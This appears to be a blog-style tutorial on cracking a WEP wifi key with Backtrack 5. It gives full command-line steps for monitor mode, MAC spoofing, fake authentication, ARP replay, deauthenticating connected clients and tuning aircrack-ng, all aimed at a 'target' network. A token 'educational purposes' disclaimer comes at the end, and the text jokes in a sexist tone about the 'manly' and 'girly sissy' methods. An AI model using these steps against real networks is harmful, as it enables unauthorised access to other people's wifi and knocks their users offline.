Cracking WEP with Backtrack 5

This is the oldschool way. Command line only. Nowadays, Backtrack includes a pretty cool program called gerix wifi cracker. It makes things ridiculously easy, and doesn't really need any explanation. There's plenty of youtube videos about it. For the time being, here's the manly man's masculine way to do it:

1.) Start monitor mode:

 

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or"wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating client’s MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

• Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

• Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

• Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by4 more if that’s unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

• Other attack methods:

Injection attack with 2 wireless cards:

aireplay -9 -i (receiving interface) (injecting interface)

If fails on Attack -5, make sure the injection interface MAC matches the current card MAC



Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

This will disconnect the authenticated client, so they may be suspect

Fair warning

Depending on where you are on this beautiful planet, connecting to someone else's wifi may or may not be entirely legal. The instructions above are merely for educational purposes (one can always test the security or lack thereof of one's own network). As it was mentioned at the beginning, this was the manly man's way. For the girly sissy way, go to youtube and look up gerix-wifi-cracker. It's made everything way easier. :)